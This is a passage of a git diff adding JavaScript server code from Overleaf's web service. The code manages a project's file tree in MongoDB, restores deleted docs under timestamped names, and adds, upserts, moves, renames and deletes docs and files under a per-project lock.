fileRef) { + await DeletedFile.create({ + projectId, + _id: fileRef._id, + name: fileRef.name, + linkedFileData: fileRef.linkedFileData, + hash: fileRef.hash, + deletedAt: new Date(), + }) +} + +async function _removeElementFromMongoArray( + modelId, + path, + elementId, + userId, + deleteRootDoc = false +) { + const nonArrayPath = path.slice(0, path.lastIndexOf('.')) + const options = { new: true } + const query = { _id: modelId } + const update = { + $pull: { [nonArrayPath]: { _id: elementId } }, + $inc: { version: 1 }, + $set: { lastUpdated: new Date(), lastUpdatedBy: userId }, + } + if (deleteRootDoc) { + update.$unset = { rootDoc_id: 1 } + } + return Project.findOneAndUpdate(query, update, options).exec() +} + +function _countElements(project) { + function countFolder(folder) { + if (folder == null) { + return 0 + } + + let total = 0 + if (folder.folders) { + total += folder.folders.length + for (const subfolder of iterablePaths(folder, 'folders')) { + total += countFolder(subfolder) + } + } + if (folder.docs) { + total += folder.docs.length + } + if (folder.fileRefs) { + total += folder.fileRefs.length + } + return total + } + + return countFolder(project.rootFolder[0]) +} + +async function _putElement(project, folderId, element, type, userId) { + if (element == null || element._id == null) { + logger.warn( + { projectId: project._id, folderId, element, type }, + 'failed trying to insert element as it was null' + ) + throw new Error('no element passed to be inserted') + } + + const pathSegment = _getMongoPathSegmentFromType(type) + + // original check path.resolve("/", element.name) isnt "/#{element.name}" or element.name.match("/") + // check if name is allowed + if (!SafePath.isCleanFilename(element.name)) { + logger.warn( + { projectId: project._id, folderId, element, type }, + 'failed trying to insert element as name was invalid' + ) + throw new Errors.InvalidNameError('invalid element name') + } + + if (folderId == null) { + folderId = project.rootFolder[0]._id + } + + if (_countElements(project) > Settings.maxEntitiesPerProject) { + logger.warn( + { projectId: project._id }, + 'project too big, stopping insertions' + ) + CooldownManager.putProjectOnCooldown(project._id) + throw new Error('project_has_too_many_files') + } + + const { element: folder, path } = await ProjectLocator.promises.findElement({ + project, + element_id: folderId, + type: 'folder', + }) + const newPath = { + fileSystem: `${path.fileSystem}/${element.name}`, + mongo: path.mongo, + } + // check if the path would be too long + if (!SafePath.isAllowedLength(newPath.fileSystem)) { + throw new Errors.InvalidNameError('path too long') + } + // Prevent top-level docs/files with reserved names (to match v1 behaviour) + if (_blockedFilename(newPath, type)) { + throw new Errors.InvalidNameError('blocked element name') + } + _checkValidElementName(folder, element.name) + element._id = new ObjectId(element._id.toString()) + const mongoPath = `${path.mongo}.${pathSegment}` + const newProject = await Project.findOneAndUpdate( + { _id: project._id, [path.mongo]: { $exists: true } }, + { + $push: { [mongoPath]: element }, + $inc: { version: 1 }, + $set: { lastUpdated: new Date(), lastUpdatedBy: userId }, + }, + { new: true } + ).exec() + if (newProject == null) { + throw new OError('Project not found or path not found in filetree', { + projectId: project._id, + path, + }) + } + return { result: { path: newPath }, project: newProject } +} + +function _blockedFilename(entityPath, entityType) { + // check if name would be 
blocked in v1 + // javascript reserved names are forbidden for docs and files + // at the top-level (but folders with reserved names are allowed). + const isFolder = entityType === 'folder' + const dir = path.dirname(entityPath.fileSystem) + const file = path.basename(entityPath.fileSystem) + const isTopLevel = dir === '/' + if (isTopLevel && !isFolder && SafePath.isBlockedFilename(file)) { + return true + } else { + return false + } +} + +function _getMongoPathSegmentFromType(type) { + const pathSegment = ENTITY_TYPE_TO_MONGO_PATH_SEGMENT[type] + if (pathSegment == null) { + throw new Error(`Unknown entity type: ${type}`) + } + return pathSegment +} + +/** + * Check if the name is already taken by a doc, file or folder. If so, return an + * error "file already exists". + */ +function _checkValidElementName(folder, name) { + if (folder == null) { + return + } + const elements = [] + .concat(folder.docs || []) + .concat(folder.fileRefs || []) + .concat(folder.folders || []) + for (const element of elements) { + if (element.name === name) { + throw new Errors.DuplicateNameError('file already exists') + } + } +} + +function _confirmFolder(project, folderId) { + if (folderId == null) { + return project.rootFolder[0]._id + } else { + return folderId + } +} + +function _checkValidFolderPath(folderPath, destinationFolderPath) { + if (!folderPath.endsWith('/')) { + folderPath += '/' + } + + if (!destinationFolderPath.endsWith('/')) { + destinationFolderPath += '/' + } + + if (destinationFolderPath === folderPath) { + throw new Errors.InvalidNameError('destination folder is the same as me') + } + + if (destinationFolderPath.startsWith(folderPath)) { + throw new Errors.InvalidNameError( + 'destination folder is a child folder of me' + ) + } +} + +async function _checkValidMove( + project, + entityType, + entity, + entityPath, + destFolderId +) { + const { element: destEntity, path: destFolderPath } = + await ProjectLocator.promises.findElement({ + project, + element_id: destFolderId, + type: 'folder', + }) + + // check if there is already a doc/file/folder with the same name + // in the destination folder + _checkValidElementName(destEntity, entity.name) + + // check if the folder being moved is a parent of the destination folder + if (/folder/.test(entityType)) { + _checkValidFolderPath(entityPath.fileSystem, destFolderPath.fileSystem) + } +} + +/** + * Create an initial file tree out of a list of doc and file entries + * + * Each entry specifies a path to the doc or file. Folders are automatically + * created. + * + * @param {ObjectId} projectId - id of the project + * @param {DocEntry[]} docEntries - list of docs to add + * @param {FileEntry[]} fileEntries - list of files to add + * @return {Promise<string>} the project version after the operation + */ +async function createNewFolderStructure(projectId, docEntries, fileEntries) { + try { + const rootFolder = FolderStructureBuilder.buildFolderStructure( + docEntries, + fileEntries + ) + const project = await Project.findOneAndUpdate( + { + _id: projectId, + 'rootFolder.0.folders.0': { $exists: false }, + 'rootFolder.0.docs.0': { $exists: false }, + 'rootFolder.0.files.0': { $exists: false }, + }, + { + $set: { + rootFolder: [rootFolder], + // NOTE: Do not set lastUpdated/lastUpdatedBy here. They are both set when creating the initial record. + // The newly created clsi-cache record uses the lastUpdated timestamp of the initial record. Updating the lastUpdated timestamp here invalidates the cache record. 
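+          // The $exists guards in the filter above (the root folder must
+          // have no subfolders, docs or files yet) make this a one-shot
+          // operation: on a project that already has content the update
+          // matches nothing and the error below is thrown.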
+        },
+        $inc: { version: 1 },
+      },
+      {
+        new: true,
+        lean: true,
+        fields: { version: 1 },
+      }
+    ).exec()
+    if (project == null) {
+      throw new OError('project not found or folder structure already exists', {
+        projectId,
+      })
+    }
+    return project.version
+  } catch (err) {
+    throw OError.tag(err, 'failed to create folder structure', { projectId })
+  }
+}
+
+/**
+ * Given a Mongo path to an entity, return the Mongo path to the parent folder
+ */
+function _getParentMongoPath(mongoPath) {
+  const segments = mongoPath.split('.')
+  if (segments.length <= 2) {
+    throw new Error('Root folder has no parents')
+  }
+  return segments.slice(0, -2).join('.')
+}
diff --git a/services/web/app/src/Features/Project/ProjectEntityRestoreHandler.js b/services/web/app/src/Features/Project/ProjectEntityRestoreHandler.js
new file mode 100644
index 0000000..2ab8a23
--- /dev/null
+++ b/services/web/app/src/Features/Project/ProjectEntityRestoreHandler.js
@@ -0,0 +1,45 @@
+const { callbackify } = require('util')
+const Path = require('path')
+const ProjectEntityHandler = require('./ProjectEntityHandler')
+const EditorController = require('../Editor/EditorController')
+
+// generate a new name based on the original, with an optional label.
+// e.g. origname-2021-01-01-122345678.tex (default)
+//      origname-restored-2021-01-01-122345678.tex (label="restored")
+function generateRestoredName(docName, label) {
+  const formattedTimestamp = new Date()
+    .toISOString()
+    .replace('T', '-')
+    .replace(/[^0-9-]/g, '')
+  const extension = Path.extname(docName)
+  const basename =
+    Path.basename(docName, extension) + (label ? `-${label}` : '')
+  return `${basename}-${formattedTimestamp}${extension}`
+}
+
+async function restoreDeletedDoc(projectId, docId, docName, userId) {
+  const deletedDoc = await ProjectEntityHandler.promises.getDoc(
+    projectId,
+    docId,
+    { include_deleted: true }
+  )
+  const deletedDocName = generateRestoredName(docName)
+  // Create the doc and emit a websocket message.
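+  // e.g. restoring the deleted 'chapter.tex' recreates its lines and ranges
+  // as a new doc in the root folder (folderId is null below) under the
+  // timestamped name produced by generateRestoredName above.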
+ return await EditorController.promises.addDocWithRanges( + projectId, + null, + `${deletedDocName}`, + deletedDoc.lines, + deletedDoc.ranges, + null, + userId + ) +} + +module.exports = { + restoreDeletedDoc: callbackify(restoreDeletedDoc), + generateRestoredName, + promises: { + restoreDeletedDoc, + }, +} diff --git a/services/web/app/src/Features/Project/ProjectEntityUpdateHandler.js b/services/web/app/src/Features/Project/ProjectEntityUpdateHandler.js new file mode 100644 index 0000000..a3ae3e0 --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectEntityUpdateHandler.js @@ -0,0 +1,1729 @@ +const _ = require('lodash') +const OError = require('@overleaf/o-error') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const Path = require('path') +const fs = require('fs') +const { Doc } = require('../../models/Doc') +const DocstoreManager = require('../Docstore/DocstoreManager') +const DocumentUpdaterHandler = require('../../Features/DocumentUpdater/DocumentUpdaterHandler') +const Errors = require('../Errors/Errors') +const FileStoreHandler = require('../FileStore/FileStoreHandler') +const LockManager = require('../../infrastructure/LockManager') +const { Project } = require('../../models/Project') +const ProjectEntityHandler = require('./ProjectEntityHandler') +const ProjectGetter = require('./ProjectGetter') +const ProjectLocator = require('./ProjectLocator') +const ProjectOptionsHandler = require('./ProjectOptionsHandler') +const ProjectUpdateHandler = require('./ProjectUpdateHandler') +const ProjectEntityMongoUpdateHandler = require('./ProjectEntityMongoUpdateHandler') +const SafePath = require('./SafePath') +const TpdsUpdateSender = require('../ThirdPartyDataStore/TpdsUpdateSender') +const FileWriter = require('../../infrastructure/FileWriter') +const EditorRealTimeController = require('../Editor/EditorRealTimeController') +const { + callbackifyMultiResult, + callbackify, +} = require('@overleaf/promise-utils') +const { iterablePaths } = require('./IterablePath') + +const LOCK_NAMESPACE = 'sequentialProjectStructureUpdateLock' +const VALID_ROOT_DOC_EXTENSIONS = Settings.validRootDocExtensions +const VALID_ROOT_DOC_REGEXP = new RegExp( + `^\\.(${VALID_ROOT_DOC_EXTENSIONS.join('|')})$`, + 'i' +) + +function wrapWithLock(methodWithoutLock, lockManager = LockManager) { + // This lock is used to make sure that the project structure updates are made + // sequentially. In particular the updates must be made in mongo and sent to + // the doc-updater in the same order. 
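+  //
+  // Two calling conventions are supported: a plain async function, or a
+  // { beforeLock, withLock } pair, where beforeLock runs outside the lock
+  // (e.g. addFile uploads to the filestore there) and only the withLock
+  // stage runs while the project lock is held.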
+ if (typeof methodWithoutLock === 'function') { + const methodWithLock = async (projectId, ...rest) => { + return lockManager.promises.runWithLock(LOCK_NAMESPACE, projectId, () => + methodWithoutLock(projectId, ...rest) + ) + } + methodWithLock.withoutLock = methodWithoutLock + return methodWithLock + } else { + // handle case with separate setup and locked stages + const mainTask = methodWithoutLock.withLock + const methodWithLock = async (projectId, ...rest) => { + const arg = await methodWithoutLock.beforeLock(projectId, ...rest) + return lockManager.promises.runWithLock(LOCK_NAMESPACE, projectId, () => + mainTask(arg) + ) + } + methodWithLock.withoutLock = async (...args) => { + return await mainTask(await methodWithoutLock.beforeLock(...args)) + } + methodWithLock.beforeLock = methodWithoutLock.beforeLock + methodWithLock.mainTask = methodWithoutLock.withLock + return methodWithLock + } +} + +async function getDocContext(projectId, docId) { + let project + try { + project = await ProjectGetter.promises.getProject(projectId, { + name: true, + rootFolder: true, + }) + } catch (err) { + throw OError.tag(err, 'error fetching project', { + projectId, + }) + } + + if (!project) { + throw new Errors.NotFoundError('project not found') + } + try { + const { path, folder } = await ProjectLocator.promises.findElement({ + project, + element_id: docId, + type: 'docs', + }) + return { + projectName: project.name, + isDeletedDoc: false, + path: path.fileSystem, + folder, + } + } catch (err) { + if (err instanceof Errors.NotFoundError) { + // (Soft-)Deleted docs are removed from the file-tree (rootFolder). + // docstore can tell whether it exists and is (soft)-deleted. + let isDeletedDoc + try { + isDeletedDoc = await DocstoreManager.promises.isDocDeleted( + projectId, + docId + ) + if (!isDeletedDoc) { + // NOTE: This can happen while we delete a doc: + // 1. web will update the projects entry + // 2. web triggers flushes to tpds/doc-updater + // 3. web triggers (soft)-delete in docstore + // Specifically when an update comes in after 1 + // and before 3 completes. 
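+          // In that window the doc is already gone from the file-tree but
+          // not yet flagged as deleted in docstore, so fall through and
+          // treat it as deleted (path and folder are null below).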
+ logger.debug( + { projectId, docId }, + 'updating doc that is in process of getting soft-deleted' + ) + } + return { + projectName: project.name, + isDeletedDoc: true, + path: null, + folder: null, + } + } catch (error) { + if (error instanceof Errors.NotFoundError) { + logger.warn( + { projectId, docId }, + 'doc not found while updating doc lines' + ) + throw error + } + throw OError.tag( + error, + 'error checking deletion status with docstore', + { + projectId, + docId, + } + ) + } + } else { + throw OError.tag(err, 'error finding doc in rootFolder', { + docId, + projectId, + }) + } + } +} + +async function updateDocLines( + projectId, + docId, + lines, + version, + ranges, + lastUpdatedAt, + lastUpdatedBy +) { + let ctx + try { + ctx = await getDocContext(projectId, docId) + } catch (error) { + if (error instanceof Errors.NotFoundError) { + // Do not allow an update to a doc which has never exist on this project + logger.warn( + { docId, projectId }, + 'project or doc not found while updating doc lines' + ) + } + + throw error + } + const { projectName, isDeletedDoc, path, folder } = ctx + logger.debug({ projectId, docId }, 'telling docstore manager to update doc') + let modified, rev + try { + ;({ modified, rev } = await DocstoreManager.promises.updateDoc( + projectId, + docId, + lines, + version, + ranges + )) + } catch (err) { + throw OError.tag(err, 'error sending doc to docstore', { docId, projectId }) + } + // path will only be present if the doc is not deleted + if (!modified || isDeletedDoc) { + return { rev } + } + // Don't need to block for marking as updated + ProjectUpdateHandler.promises + .markAsUpdated(projectId, lastUpdatedAt, lastUpdatedBy) + .catch(error => { + logger.error({ error }, 'failed to mark project as updated') + }) + await TpdsUpdateSender.promises.addDoc({ + projectId, + path, + docId, + projectName, + rev, + folderId: folder?._id, + }) + return { rev, modified } +} + +async function setRootDoc(projectId, newRootDocID) { + logger.debug({ projectId, rootDocId: newRootDocID }, 'setting root doc') + if (projectId == null || newRootDocID == null) { + throw new Errors.InvalidError('missing arguments (project or doc)') + } + const docPath = + await ProjectEntityHandler.promises.getDocPathByProjectIdAndDocId( + projectId, + newRootDocID + ) + if (ProjectEntityUpdateHandler.isPathValidForRootDoc(docPath)) { + await Project.updateOne( + { _id: projectId }, + { rootDoc_id: newRootDocID } + ).exec() + } else { + throw new Errors.UnsupportedFileTypeError( + 'invalid file extension for root doc' + ) + } +} + +async function unsetRootDoc(projectId) { + logger.debug({ projectId }, 'removing root doc') + await Project.updateOne( + { _id: projectId }, + { $unset: { rootDoc_id: true } } + ).exec() +} + +async function addDoc(projectId, folderId, docName, docLines, userId, source) { + return await ProjectEntityUpdateHandler.promises.addDocWithRanges( + projectId, + folderId, + docName, + docLines, + {}, + userId, + source + ) +} + +const addDocWithRanges = wrapWithLock({ + async beforeLock( + projectId, + folderId, + docName, + docLines, + ranges, + userId, + source + ) { + if (!SafePath.isCleanFilename(docName)) { + throw new Errors.InvalidNameError('invalid element name') + } + // Put doc in docstore first, so that if it errors, we don't have a doc_id in the project + // which hasn't been created in docstore. 
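+    // If updateDoc throws here, the new doc's _id has not been written into
+    // the project filetree yet, so there is nothing to roll back.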
+ const doc = new Doc({ name: docName }) + const { rev } = await DocstoreManager.promises.updateDoc( + projectId.toString(), + doc._id.toString(), + docLines, + 0, + ranges + ) + + doc.rev = rev + return { + projectId, + folderId, + doc, + docName, + docLines, + ranges, + userId, + source, + } + }, + async withLock({ + projectId, + folderId, + doc, + docName, + docLines, + ranges, + userId, + source, + }) { + const { result, project } = + await ProjectEntityUpdateHandler._addDocAndSendToTpds( + projectId, + folderId, + doc, + userId + ) + const docPath = result?.path?.fileSystem + const projectHistoryId = project?.overleaf?.history?.id + const newDocs = [ + { + doc, + path: docPath, + docLines: docLines.join('\n'), + ranges, + }, + ] + await DocumentUpdaterHandler.promises.updateProjectStructure( + projectId, + projectHistoryId, + userId, + { newDocs, newProject: project }, + source + ) + return { doc, folderId: folderId || project.rootFolder[0]._id } + }, +}) + +const addFile = wrapWithLock({ + async beforeLock( + projectId, + folderId, + fileName, + fsPath, + linkedFileData, + userId, + source + ) { + if (!SafePath.isCleanFilename(fileName)) { + throw new Errors.InvalidNameError('invalid element name') + } + const { url, fileRef, createdBlob } = + await ProjectEntityUpdateHandler._uploadFile( + projectId, + folderId, + fileName, + fsPath, + linkedFileData + ) + + return { + projectId, + folderId, + userId, + fileRef, + fileStoreUrl: url, + createdBlob, + source, + } + }, + async withLock({ + projectId, + folderId, + userId, + fileRef, + fileStoreUrl, + createdBlob, + source, + }) { + const { result, project } = + await ProjectEntityUpdateHandler._addFileAndSendToTpds( + projectId, + folderId, + fileRef, + userId + ) + const projectHistoryId = project.overleaf?.history?.id + const newFiles = [ + { + createdBlob, + file: fileRef, + path: result && result.path && result.path.fileSystem, + url: fileStoreUrl, + }, + ] + await DocumentUpdaterHandler.promises.updateProjectStructure( + projectId, + projectHistoryId, + userId, + { newFiles, newProject: project }, + source + ) + return { fileRef, folderId, createdBlob } + }, +}) + +const upsertDoc = wrapWithLock( + async function (projectId, folderId, docName, docLines, source, userId) { + if (!SafePath.isCleanFilename(docName)) { + throw new Errors.InvalidNameError('invalid element name') + } + let element, folderPath + try { + ;({ element, path: folderPath } = + await ProjectLocator.promises.findElement({ + project_id: projectId, + element_id: folderId, + type: 'folder', + })) + } catch (error) { + if (error instanceof Errors.NotFoundError) { + throw new Error('folder_not_found') + } + throw error + } + + if (element == null) { + throw new Error("Couldn't find folder") + } + + const existingDoc = element.docs.find(({ name }) => name === docName) + const existingFile = element.fileRefs.find(({ name }) => name === docName) + if (existingFile) { + const doc = new Doc({ name: docName }) + const filePath = `${folderPath.fileSystem}/${existingFile.name}` + const { rev } = await DocstoreManager.promises.updateDoc( + projectId.toString(), + doc._id.toString(), + docLines, + 0, + {} + ) + + doc.rev = rev + const project = + await ProjectEntityMongoUpdateHandler.promises.replaceFileWithDoc( + projectId, + existingFile._id, + doc, + userId + ) + + await TpdsUpdateSender.promises.addDoc({ + projectId, + docId: doc._id, + path: filePath, + projectName: project.name, + rev: existingFile.rev + 1, + folderId, + }) + + const projectHistoryId = + project.overleaf 
&& + project.overleaf.history && + project.overleaf.history.id + const newDocs = [ + { + doc, + path: filePath, + docLines: docLines.join('\n'), + }, + ] + const oldFiles = [ + { + file: existingFile, + path: filePath, + }, + ] + await DocumentUpdaterHandler.promises.updateProjectStructure( + projectId, + projectHistoryId, + userId, + { oldFiles, newDocs, newProject: project }, + source + ) + + EditorRealTimeController.emitToRoom( + projectId, + 'removeEntity', + existingFile._id, + 'convertFileToDoc' + ) + return { doc, isNew: true } + } else if (existingDoc) { + const result = await DocumentUpdaterHandler.promises.setDocument( + projectId, + existingDoc._id, + userId, + docLines, + source + ) + logger.debug( + { projectId, docId: existingDoc._id }, + 'notifying users that the document has been updated' + ) + // there is no need to flush the doc to mongo at this point as docupdater + // flushes it as part of setDoc. + // + // combine rev from response with existing doc metadata + return { + doc: { ...existingDoc, ...result }, + isNew: existingDoc == null, + } + } else { + const { doc } = + await ProjectEntityUpdateHandler.promises.addDocWithRanges.withoutLock( + projectId, + folderId, + docName, + docLines, + {}, + userId, + source + ) + + return { doc, isNew: existingDoc == null } + } + } +) + +const appendToDoc = wrapWithLock( + async (projectId, docId, lines, source, userId) => { + const { element } = await ProjectLocator.promises.findElement({ + project_id: projectId, + element_id: docId, + type: 'doc', + }) + + return await DocumentUpdaterHandler.promises.appendToDocument( + projectId, + element._id, + userId, + lines, + source + ) + } +) + +const upsertFile = wrapWithLock({ + async beforeLock( + projectId, + folderId, + fileName, + fsPath, + linkedFileData, + userId, + source + ) { + if (!SafePath.isCleanFilename(fileName)) { + throw new Errors.InvalidNameError('invalid element name') + } + // create a new file + const fileArgs = { + name: fileName, + linkedFileData, + } + const { url, fileRef, createdBlob } = + await FileStoreHandler.promises.uploadFileFromDisk( + projectId, + fileArgs, + fsPath + ) + + return { + projectId, + folderId, + fileName, + fsPath, + linkedFileData, + userId, + fileRef, + fileStoreUrl: url, + createdBlob, + source, + } + }, + async withLock({ + projectId, + folderId, + fileName, + userId, + fileRef, + fileStoreUrl, + createdBlob, + source, + }) { + let element + try { + ;({ element } = await ProjectLocator.promises.findElement({ + project_id: projectId, + element_id: folderId, + type: 'folder', + })) + } catch (error) { + if (error instanceof Errors.NotFoundError) { + throw new Error('folder_not_found') + } + throw error + } + + if (element == null) { + throw new Error("Couldn't find folder") + } + const existingFile = element.fileRefs.find(({ name }) => name === fileName) + const existingDoc = element.docs.find(({ name }) => name === fileName) + + if (existingDoc) { + let path + try { + ;({ path } = await ProjectLocator.promises.findElement({ + project_id: projectId, + element_id: existingDoc._id, + type: 'doc', + })) + } catch (err) { + throw new Error("couldn't find existing file") + } + const project = + await ProjectEntityMongoUpdateHandler.promises.replaceDocWithFile( + projectId, + existingDoc._id, + fileRef, + userId + ) + const projectHistoryId = project.overleaf?.history?.id + await TpdsUpdateSender.promises.addFile({ + projectId: project._id, + historyId: projectHistoryId, + fileId: fileRef._id, + hash: fileRef.hash, + path: path.fileSystem, + 
rev: fileRef.rev, + projectName: project.name, + folderId, + }) + await DocumentUpdaterHandler.promises.updateProjectStructure( + projectId, + projectHistoryId, + userId, + { + oldDocs: [{ doc: existingDoc, path: path.fileSystem }], + + newFiles: [ + { + createdBlob, + file: fileRef, + path: path.fileSystem, + url: fileStoreUrl, + }, + ], + newProject: project, + }, + source + ) + EditorRealTimeController.emitToRoom( + projectId, + 'removeEntity', + existingDoc._id, + 'convertDocToFile' + ) + return { fileRef, isNew: true, oldFileRef: existingFile } + } else if (existingFile) { + await ProjectEntityUpdateHandler._replaceFile( + projectId, + existingFile._id, + userId, + fileRef, + fileStoreUrl, + folderId, + source, + createdBlob + ) + + return { fileRef, isNew: false, oldFileRef: existingFile } + } else { + // this calls directly into the addFile main task (without the beforeLock part) + await ProjectEntityUpdateHandler.promises.addFile.mainTask({ + projectId, + folderId, + userId, + fileRef, + fileStoreUrl, + createdBlob, + source, + }) + + return { + fileRef, + isNew: existingFile == null, + oldFileRef: existingFile, + } + } + }, +}) + +const upsertDocWithPath = wrapWithLock( + async function (projectId, elementPath, docLines, source, userId) { + if (!SafePath.isCleanPath(elementPath)) { + throw new Errors.InvalidNameError('invalid element name') + } + const docName = Path.basename(elementPath) + const folderPath = Path.dirname(elementPath) + const { newFolders, folder } = + await ProjectEntityUpdateHandler.promises.mkdirp.withoutLock( + projectId, + folderPath, + userId + ) + const { isNew, doc } = + await ProjectEntityUpdateHandler.promises.upsertDoc.withoutLock( + projectId, + folder._id, + docName, + docLines, + source, + userId + ) + + return { doc, isNew, newFolders, folder } + } +) + +const upsertFileWithPath = wrapWithLock({ + async beforeLock( + projectId, + elementPath, + fsPath, + linkedFileData, + userId, + source + ) { + if (!SafePath.isCleanPath(elementPath)) { + throw new Errors.InvalidNameError('invalid element name') + } + const fileName = Path.basename(elementPath) + const folderPath = Path.dirname(elementPath) + // create a new file + const fileArgs = { + name: fileName, + linkedFileData, + } + const { + url: fileStoreUrl, + fileRef, + createdBlob, + } = await FileStoreHandler.promises.uploadFileFromDisk( + projectId, + fileArgs, + fsPath + ) + + return { + projectId, + folderPath, + fileName, + fsPath, + linkedFileData, + userId, + fileRef, + fileStoreUrl, + createdBlob, + source, + } + }, + async withLock({ + projectId, + folderPath, + fileName, + fsPath, + linkedFileData, + userId, + fileRef, + fileStoreUrl, + createdBlob, + source, + }) { + const { newFolders, folder } = + await ProjectEntityUpdateHandler.promises.mkdirp.withoutLock( + projectId, + folderPath, + userId + ) + // this calls directly into the upsertFile main task (without the beforeLock part) + const { + fileRef: newFileRef, + isNew, + oldFileRef, + } = await ProjectEntityUpdateHandler.promises.upsertFile.mainTask({ + projectId, + folderId: folder._id, + fileName, + fsPath, + linkedFileData, + userId, + fileRef, + fileStoreUrl, + createdBlob, + source, + }) + + return { + fileRef: newFileRef, + isNew, + oldFileRef, + newFolders, + folder, + } + }, +}) + +const deleteEntity = wrapWithLock( + async function (projectId, entityId, entityType, userId, source, callback) { + logger.debug({ entityId, entityType, projectId }, 'deleting project entity') + if (entityType == null) { + logger.warn({ err: 'No 
entityType set', projectId, entityId }) + throw new Error('No entityType set') + } + entityType = entityType.toLowerCase() + + // Flush the entire project to avoid leaving partially deleted docs in redis. + await DocumentUpdaterHandler.promises.flushProjectToMongo(projectId) + + const { entity, path, projectBeforeDeletion, newProject } = + await ProjectEntityMongoUpdateHandler.promises.deleteEntity( + projectId, + entityId, + entityType, + userId + ) + const subtreeListing = await ProjectEntityUpdateHandler._cleanUpEntity( + projectBeforeDeletion, + newProject, + entity, + entityType, + path.fileSystem, + userId, + source + ) + + const subtreeEntityIds = subtreeListing.map(entry => + entry.entity._id.toString() + ) + await TpdsUpdateSender.promises.deleteEntity({ + projectId, + path: path.fileSystem, + projectName: projectBeforeDeletion.name, + entityId, + entityType, + subtreeEntityIds, + }) + + return entityId + } +) + +const deleteEntityWithPath = wrapWithLock( + async (projectId, path, userId, source) => { + const { element, type } = await ProjectLocator.promises.findElementByPath({ + project_id: projectId, + path, + exactCaseMatch: true, + }) + if (element == null) { + throw new Errors.NotFoundError('project not found') + } + return await ProjectEntityUpdateHandler.promises.deleteEntity.withoutLock( + projectId, + element._id, + type, + userId, + source + ) + } +) + +const mkdirp = wrapWithLock(async function (projectId, path, userId) { + for (const folder of path.split('/')) { + if (folder.length > 0 && !SafePath.isCleanFilename(folder)) { + throw new Errors.InvalidNameError('invalid element name') + } + } + return await ProjectEntityMongoUpdateHandler.promises.mkdirp( + projectId, + path, + userId, + { exactCaseMatch: false } + ) +}) + +const mkdirpWithExactCase = wrapWithLock( + async function (projectId, path, userId) { + for (const folder of path.split('/')) { + if (folder.length > 0 && !SafePath.isCleanFilename(folder)) { + throw new Errors.InvalidNameError('invalid element name') + } + } + return await ProjectEntityMongoUpdateHandler.promises.mkdirp( + projectId, + path, + userId, + { exactCaseMatch: true } + ) + } +) + +const addFolder = wrapWithLock( + async function (projectId, parentFolderId, folderName, userId) { + if (!SafePath.isCleanFilename(folderName)) { + throw new Errors.InvalidNameError('invalid element name') + } + return await ProjectEntityMongoUpdateHandler.promises.addFolder( + projectId, + parentFolderId, + folderName, + userId + ) + } +) + +const moveEntity = wrapWithLock( + async function ( + projectId, + entityId, + destFolderId, + entityType, + userId, + source + ) { + logger.debug( + { entityType, entityId, projectId, destFolderId }, + 'moving entity' + ) + if (entityType == null) { + logger.warn({ err: 'No entityType set', projectId, entityId }) + throw new Error('No entityType set') + } + entityType = entityType.toLowerCase() + await DocumentUpdaterHandler.promises.flushProjectToMongo(projectId) + const { project, startPath, endPath, rev, changes } = + await ProjectEntityMongoUpdateHandler.promises.moveEntity( + projectId, + entityId, + destFolderId, + entityType, + userId + ) + + const projectHistoryId = project.overleaf?.history?.id + try { + await TpdsUpdateSender.promises.moveEntity({ + projectId, + projectName: project.name, + startPath, + endPath, + rev, + entityId, + entityType, + folderId: destFolderId, + }) + } catch (err) { + logger.error({ err }, 'error sending tpds update') + } + + return await 
DocumentUpdaterHandler.promises.updateProjectStructure( + projectId, + projectHistoryId, + userId, + changes, + source + ) + } +) + +const renameEntity = wrapWithLock( + async function (projectId, entityId, entityType, newName, userId, source) { + if (!newName || typeof newName !== 'string') { + const err = new OError('invalid newName value', { + value: newName, + type: typeof newName, + projectId, + entityId, + entityType, + userId, + source, + }) + logger.error({ err }, 'Invalid newName passed to renameEntity') + throw err + } + if (!SafePath.isCleanFilename(newName)) { + throw new Errors.InvalidNameError('invalid element name') + } + logger.debug({ entityId, projectId }, `renaming ${entityType}`) + if (entityType == null) { + logger.warn({ err: 'No entityType set', projectId, entityId }) + throw new Error('No entityType set') + } + entityType = entityType.toLowerCase() + await DocumentUpdaterHandler.promises.flushProjectToMongo(projectId) + const { project, startPath, endPath, rev, changes } = + await ProjectEntityMongoUpdateHandler.promises.renameEntity( + projectId, + entityId, + entityType, + newName, + userId + ) + + const projectHistoryId = project.overleaf?.history?.id + try { + await TpdsUpdateSender.promises.moveEntity({ + projectId, + projectName: project.name, + startPath, + endPath, + rev, + entityId, + entityType, + folderId: null, // this means the folder has not changed + }) + } catch (err) { + logger.error({ err }, 'error sending tpds update') + } + return await DocumentUpdaterHandler.promises.updateProjectStructure( + projectId, + projectHistoryId, + userId, + changes, + source + ) + } +) + +// This doesn't directly update project structure, but we need to take the lock +// to prevent anything else being queued before the resync update +const resyncProjectHistory = wrapWithLock( + async (projectId, opts) => { + const project = await ProjectGetter.promises.getProject(projectId, { + rootFolder: true, + overleaf: true, + }) + const projectHistoryId = project.overleaf?.history?.id + if (projectHistoryId == null) { + throw new Errors.ProjectHistoryDisabledError( + `project history not enabled for ${projectId}` + ) + } + + const { docs, files, folders } = + ProjectEntityHandler.getAllEntitiesFromProject(project) + // _checkFileTree() must be passed the folders before docs and + // files + await ProjectEntityUpdateHandler._checkFiletree( + projectId, + projectHistoryId, + [...folders, ...docs, ...files] + ) + + await DocumentUpdaterHandler.promises.resyncProjectHistory( + projectId, + projectHistoryId, + docs, + files, + opts + ) + if (opts.historyRangesMigration) { + return await ProjectOptionsHandler.promises.setHistoryRangesSupport( + projectId, + opts.historyRangesMigration === 'forwards' + ) + } + }, + LockManager.withTimeout(6 * 60) // use an extended lock for the resync operations +) + +const convertDocToFile = wrapWithLock({ + async beforeLock(projectId, docId, userId, source) { + await DocumentUpdaterHandler.promises.flushDocToMongo(projectId, docId) + const { element: doc, path } = await ProjectLocator.promises.findElement({ + project_id: projectId, + element_id: docId, + type: 'doc', + }) + const docPath = path.fileSystem + const { lines, rev, ranges } = await DocstoreManager.promises.getDoc( + projectId, + docId + ) + if (!_.isEmpty(ranges)) { + throw new Errors.DocHasRangesError({}) + } + await DocumentUpdaterHandler.promises.deleteDoc(projectId, docId, false) + const fsPath = await FileWriter.promises.writeLinesToDisk(projectId, lines) + const { + url: 
